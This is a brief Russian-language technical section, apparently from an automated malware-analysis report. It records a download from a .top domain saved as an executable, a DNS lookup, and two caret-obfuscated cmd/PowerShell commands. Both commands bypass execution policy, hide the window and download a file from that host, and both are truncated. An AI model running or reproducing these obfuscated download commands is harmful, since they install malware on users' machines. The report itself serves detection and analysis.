Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wE^Rs^hE^Ll.eXe^ -executIo^n^POL^icy^ byPASS ^-N^Op^RofIL^E -W^ind^OwsTyLE^ Hidd^EN ^(N^eW-O^bjE^c^T Sy^s^Tem^.Net^.WEB^ClieNT^).downl^OADfIl^e^('http://www.fapoergol.top/re...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pO^wE^Rs^hE^Ll.eXe^ -executIo^n^POL^icy^ byPASS ^-N^Op^RofIL^E -W^ind^OwsTyLE^ Hidd^EN ^(N^eW-O^bjE^c^T Sy^s^Tem^.Net^.WEB^ClieNT^).downl^OADfIl^e^('http://www.fapoergol.top/re...' (со скрытым окном)